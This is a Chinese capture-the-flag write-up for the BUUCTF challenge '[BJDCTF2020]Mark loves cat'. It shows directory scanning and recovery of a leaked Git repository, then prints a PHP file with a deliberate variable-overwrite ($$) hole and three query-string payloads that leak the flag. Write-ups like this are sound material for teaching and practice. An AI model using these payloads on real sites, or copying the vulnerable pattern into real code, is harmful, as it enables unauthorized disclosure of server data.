练习靶场:BUUCTF 题目搜索:[BJDCTF2020]Mark loves cat
靶机启动后的界面
步骤1:我们使用工具dirsearch扫描目录,观察是否有信息泄露
python dirsearch.py -u http://cee8e5a5-0b3c-4f0c-a6ef-eed29719e632.node4.buuoj.cn:81/ 
结论存在Git泄露,我们使用工具GitHack获取信息,得到一个index.php
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';
#变量为yds,is,handsome
#yds=dog,is=cat,handsome=yds
foreach($_POST as $x => $y){ #foreach进行循坏,遍历POST,将数组中的值赋值给$y
$$x = $y;
}
foreach($_GET as $x => $y){ #foreach进行循坏,遍历GET,将数组中的值赋值给$y
$$x = $$y;
}
#满足以下几个条件
foreach($_GET as $x => $y){
if($_GET['flag'] === $x && $x !== 'flag'){#不能同时flag的值等于某个键名,那个键又是flag
exit($handsome);
}
}
if(!isset($_GET['flag']) && !isset($_POST['flag'])){ #不能同时GET和POST都设置flag
exit($yds);
}
if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){ #任意都能满足flag==='flag'
exit($is);
}
echo "the flag is: ".$flag;(1)exit()函数
exit函数的作用是输出一则消息并且终止当前脚本。 如果一段文本中包括多个以 ?>结束的脚本,则exit退出当前所在脚本,exit()函数这里存在一个突破点
(2)foreach函数
foreach()函数这里存在了变量覆盖
解法1:$handsome
第一个if语句中输出变量$handsome,满足条件$_GET['flag'] == = $x && $x !=== 'flag',构造如下
扫描二维码关注公众号,回复:
16702237 查看本文章
?handsome=flag&flag=b&b=flag
?handsome=flag&flag=handsome
解法2:$yds
第二个if语句中输出的$yds变量,我们需要通过变量覆盖达到$yds=$flag的效果,GET传参yds=flag,在第二个foreach语句中,首先是$x=yds,$y=flag,经过$$x = $$y也就变成了$yds=$flag,如下:
/?yds=flag
解法3:$is
第三个if语句中输出变量$is,判断条件为$_POST['flag'] === 'flag' || $_GET['flag'] === 'flag',这里可以通过满足后面这个条件进行变量覆盖:GET传参is=flag&flag=flag;在第二个foreach语句中,首先是$x=is,$y=flag,带进去就变成了$is=$flag,这就达到了覆盖的目的,而参数中flag=flag只是为了满足if语句
/?is=flag$flag=flag
